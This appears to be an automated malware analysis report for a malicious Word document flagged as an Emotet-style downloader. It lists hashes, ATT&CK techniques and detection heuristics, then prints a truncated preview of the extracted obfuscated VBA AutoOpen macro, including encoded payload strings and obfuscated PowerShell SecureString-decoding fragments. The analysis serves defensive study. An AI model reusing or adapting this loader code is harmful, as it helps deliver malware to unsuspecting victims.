Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6d3b3226f209494…

MALICIOUS

Office (OLE)

154.0 KB Created: 2018-03-21 20:40:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: fc2e5a52e4412c92914413bf93f5f4c3 SHA-1: d6a28d1caf71dbc68bb4815fee6abccf1ce5663c SHA-256: e6d3b3226f209494660b9dc7dbb7eaa37b5b4bf325936d367aaec53ff931180c
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for initial execution. The macro is designed to download and execute a second-stage payload, as indicated by the 'CreateObject' call and the ClamAV detection signature 'Doc.Malware.Emodldr'. The presence of the 'macros.bas' file further supports this. The macro's obfuscated nature and lack of specific URL or command execution details prevent a more precise family attribution.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40974 bytes
SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
         Case 51809
            Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
            WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
         Case 70984
            JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
            tmoOiN = VdAHd
End Select
Select Case ZWEdXY
         Case 21648
            wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
            CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
         Case 53454
            BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
            MkLAi = BtLcfM
End Select
Select Case IXXHjB
         Case 68930
            zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
            LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
         Case 92161
            iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
            kdYtjY = pjDTFc
End Select
Select Case kvhLGR
         Case 24919
            mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
            uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
         Case 93351
            lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
            ESYjZW = qtFYur
End Select
Select Case pYoLW
         Case 29885
            opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
            jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
         Case 75080
            pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
            wtEsG = bsiOzI
End Select
Select Case MROBr
         Case 90466
            JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
            kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
         Case 85759
            OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
            zJDwo = TCSiUH
End Select
Select Case TojBqK
         Case 39895
            GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
            YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K  107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
         Case 78499
            kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
            dWsKQz = NMmdpb
End Select
Select Case UXsjKl
         Case 78708
            jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
            fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
         Case 1921
            AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
            hlNAaP = onfYsj
End Select
Select Case nlkwv
         Case 81817
            FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
            FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
         Case 94796
     
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.